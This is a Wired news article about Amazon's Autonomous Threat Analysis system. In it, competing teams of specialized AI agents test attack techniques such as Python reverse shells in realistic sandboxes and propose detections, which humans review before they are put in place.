Amazon Is Using Specialized AI Agents for Deep Bug Hunting

As generative AI pushes the speed of software development, it is also enhancing the ability of digital attackers to carry out financially motivated or state-backed hacks. This means that security teams at tech companies have more code than ever to review while dealing with even more pressure from bad actors. On Monday, Amazon will publish details for the first time of an internal system known as Autonomous Threat Analysis (ATA), which the company has been using to help its security teams proactively identify weaknesses in its platforms, perform variant analysis to quickly search for other, similar flaws, and then develop remediations and detection capabilities to plug holes before attackers find them.

ATA was born out of an internal Amazon hackathon in August 2024, and security team members say that it has grown into a crucial tool since then. The key concept underlying ATA is that it isn’t a single AI agent developed to comprehensively conduct security testing and threat analysis. Instead, Amazon developed multiple specialized AI agents that compete against each other in two teams to rapidly investigate real attack techniques and different ways they could be used against Amazon’s systems—and then propose security controls for human review.

“The initial concept was aimed to address a critical limitation in security testing—limited coverage and the challenge of keeping detection capabilities current in a rapidly evolving threat landscape,” Steve Schmidt, Amazon’s chief security officer, tells WIRED. “Limited coverage means you can’t get through all of the software or you can’t get to all of the applications because you just don’t have enough humans. And then it’s great to do an analysis of a set of software, but if you don’t keep the detection systems themselves up to date with the changes in the threat landscape, you’re missing half of the picture.”

As part of scaling its use of ATA, Amazon developed special “high-fidelity” testing environments that are deeply realistic reflections of Amazon’s production systems, so ATA can both ingest and produce real telemetry for analysis.

The company’s security teams also made a point to design ATA so every technique it employs, and detection capability it produces, is validated with real, automatic testing and system data. Red team agents that are working on finding attacks that could be used against Amazon’s systems execute actual commands in ATA’s special test environments that produce verifiable logs. Blue team, or defense-focused agents, use real telemetry to confirm whether the protections they are proposing are effective. And anytime an agent develops a novel technique, it also pulls time-stamped logs to prove that its claims are accurate.

This verifiability reduces false positives, Schmidt says, and acts as “hallucination management.” Because the system is built to demand certain standards of observable evidence, Schmidt claims that “hallucinations are architecturally impossible.”

The fact that ATA’s specialized agents work together in teams—each lending its expertise toward a larger goal—mimics the way that humans collaborate in security testing and defense development. The difference that AI provides, says Amazon security engineer Michael Moran, is the power to rapidly generate new variations and combinations of offensive techniques and then propose remediations at a scale that is prohibitively time consuming for humans alone.

“I get to come in with all the novel techniques and say, ‘I wonder if this would work?’ And now I have an entire scaffolding and a lot of the base stuff is taken care of for me” in investigating it, says Moran, who was one of the engineers who originally proposed ATA at the 2024 hackathon. “It makes my job way more fun but it also enables everything to run at machine speed.”

Schmidt notes, too, that ATA has already been extremely effective at looking at particular attack capabilities and generating defenses. In one example, the system focused on Python “reverse shell” techniques, used by hackers to manipulate target devices into initiating a remote connection to the attacker’s computer. Within hours, ATA had discovered new potential reverse shell tactics and proposed detections for Amazon’s defense systems that proved to be 100 percent effective.

ATA does its work autonomously, but it uses the “human in the loop” methodology that requires input from a real person before actually implementing changes to Amazon’s security systems. And Schmidt readily concedes that ATA is not a replacement for advanced, nuanced human security testing. Instead, he emphasizes that for the massive quantity of mundane, rote tasks involved in daily threat analysis, ATA gives human staff more time to work on complex problems.

The next step, he says, is to start using ATA in real-time incident response for faster identification and remediation in actual attacks on Amazon’s massive systems.

“AI does the grunt work behind the scenes. When our team is freed up from analyzing false positives, they can focus on real threats,” Schmidt says. “I think the part that’s most positive about this is the reception of our security engineers, because they see this as an opportunity where their talent is deployed where it matters most.”

The post Amazon Is Using Specialized AI Agents for Deep Bug Hunting appeared first on Wired.